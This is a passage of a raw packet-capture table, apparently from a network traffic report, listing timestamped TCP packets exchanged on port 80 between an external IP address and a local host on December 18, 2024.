                                                  Dec 18, 2024 14:07:42.516993999 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.517036915 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.517041922 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.517498016 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.517539978 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.517601013 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.518269062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.518315077 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.518336058 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.519356966 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.519445896 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.519467115 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.520091057 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.520133018 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.520162106 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.520704985 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.520747900 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.520859003 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.521522045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.521562099 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.521650076 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.522434950 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.522454977 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.522476912 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.523196936 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.523245096 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.523355007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.524199009 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.524276018 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.524385929 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.524971008 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.524981976 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.525027990 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.525859118 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.525903940 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.526066065 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.526808977 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.526849031 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.526983976 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.527650118 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.527690887 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.527730942 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.528187037 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.528299093 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.528321981 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.528980970 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.529026031 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.613992929 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.614034891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.614146948 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.614391088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.614506960 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.614551067 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.614629030 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.615346909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.615405083 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.615525007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.616172075 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.616214991 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.616301060 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.617029905 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.617082119 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.617082119 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.617808104 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.617854118 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.617887974 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.618621111 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.618669987 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.618688107 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.619569063 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.619613886 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.619647980 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.620318890 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.620363951 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.620429993 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.621083975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.621128082 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.621140957 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.621942997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.621988058 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.622045994 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.622787952 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.622842073 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.622873068 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.623598099 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.623641968 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.623725891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.624380112 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.624428034 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.688903093 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.688920021 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.688975096 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.689382076 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.689393997 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.689431906 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.690191031 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.690355062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.690399885 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.690958023 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.691159010 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.691205978 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.691241980 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.692025900 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.692061901 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.692064047 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.692883015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.692894936 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.692929983 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.693825006 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.693866968 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.694025040 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.694169998 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.694215059 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.694803953 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.694816113 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.694848061 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.695585012 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.695698023 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.695740938 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.696440935 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.696640015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.696679115 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.697233915 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.697244883 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.697278023 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.698098898 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.698112965 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.698151112 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.699186087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.699198961 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.699229002 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.699734926 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.699836016 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.699879885 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.700515032 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.700628996 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.700673103 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.701334000 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.701462030 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.701503992 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.702208042 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.702358007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.702395916 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.703000069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.703236103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.703279972 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.703819036 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.703969955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.704016924 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.704716921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.704813957 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.704857111 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.705507994 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.705727100 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.705822945 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.706377029 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.706696033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.706737995 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.707832098 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.707847118 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.707885027 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.708473921 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.708487034 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.708515882 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.708993912 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.709048033 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.709101915 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.709829092 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.709937096 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.709979057 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.710685015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.710808039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.710850954 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.711385965 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.711430073 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.711472988 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.712178946 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.712191105 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.712224960 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.712845087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.713013887 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.713056087 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.713731050 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.713743925 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.713795900 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.714565039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.714687109 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.714730978 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.715337038 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.715517998 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.715558052 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.716212034 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.716224909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.716276884 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.716998100 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.717329979 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.717379093 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.717866898 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.718050957 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.718096972 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.718624115 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.718720913 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.718766928 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.719458103 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.719605923 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.719652891 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.720312119 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.720315933 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.720374107 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.721231937 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.768942118 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.812268972 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.812285900 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.812351942 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.812612057 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.812730074 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.812774897 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.813436031 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.813448906 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.813492060 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.814213037 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.814327955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.814372063 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.815193892 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.815355062 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.815397978 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.815949917 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.816055059 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.816102028 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.816716909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.816870928 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.816919088 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.817501068 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.817668915 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.817714930 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.818337917 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.818586111 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.818634033 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.819252014 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.819266081 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.819328070 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.820101023 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.820208073 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.820261955 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.820841074 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.821026087 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.821073055 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.821676970 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.821800947 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.821846962 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.822448015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.862673044 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.880790949 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.880919933 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.881051064 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.881182909 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.881263018 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.881314993 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.882086039 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.882164955 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.882935047 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.882991076 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.883095980 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.883157969 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.883203030 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.884013891 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.884026051 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.884064913 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.884783983 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.884829998 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.884907007 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.885848999 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.886233091 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.886245966 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.886290073 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.886909008 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.886923075 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.886955023 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.887528896 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.887543917 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.887595892 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.888401985 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.888478041 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.888679028 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.889168024 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.889341116 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.890026093 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.890077114 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.890158892 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.890865088 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.890877962 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.890919924 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.891712904 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.891810894 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.892429113 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.892478943 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.892592907 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.892656088 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.893306017 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.893492937 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.893541098 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.894129992 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.894269943 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.894324064 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.895051956 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.895065069 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.895143986 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.895867109 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.896059990 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.896110058 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.896723986 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.896806002 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.896856070 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.897463083 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.897634983 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.897686005 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.898238897 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.898288965 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.898545980 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.899130106 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.899296045 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.899442911 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.899852037 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.899935961 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.899983883 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.900686026 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.900753975 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.900804043 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.901767015 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.901804924 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.901873112 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.902326107 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.902405977 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.902451992 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.903172970 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.903218031 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.903278112 CET4970780192.168.2.8176.113.115.178
                                                  Dec 18, 2024 14:07:42.904258013 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.904438972 CET8049707176.113.115.178192.168.2.8
                                                  Dec 18, 2024 14:07:42.904494047 CET4970780192.168.2.8176.113.115.178
